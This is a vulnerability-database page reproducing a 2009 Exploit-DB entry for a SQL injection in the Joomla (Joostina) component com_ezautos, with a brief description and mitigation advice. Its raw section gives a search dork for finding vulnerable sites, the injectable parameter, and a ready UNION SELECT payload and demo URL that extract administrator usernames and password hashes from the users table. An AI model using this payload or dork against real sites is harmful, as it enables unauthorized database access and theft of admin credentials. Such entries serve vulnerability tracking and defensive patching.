header-logo
Suggest Exploit
vendor:
com_ezautos
by:
Gamoscu
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_ezautos
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla (joostina) Component com_ezautos SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla (joostina) component com_ezautos. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially allowing them to access sensitive information or modify data.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#
# Note:  This does not affect the current version of this component. It was patched more than 15 months ago.
#
#
Joomla (joostina)  Component com_ezautos SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog :http://gamoscu.wordpress.com/

Script : Joomla http://www.joostina-cms.org/content/view/20/35/

Dork : inurl:com_ezautos
###########################

[ Vulnerable File ]

index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]

[ XpL ]

+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--

[ Demo]

http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--

##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
#
#
#
#            #Elektrikist#
#
#############################################

Navigation

Suggest Exploit

Services By CQR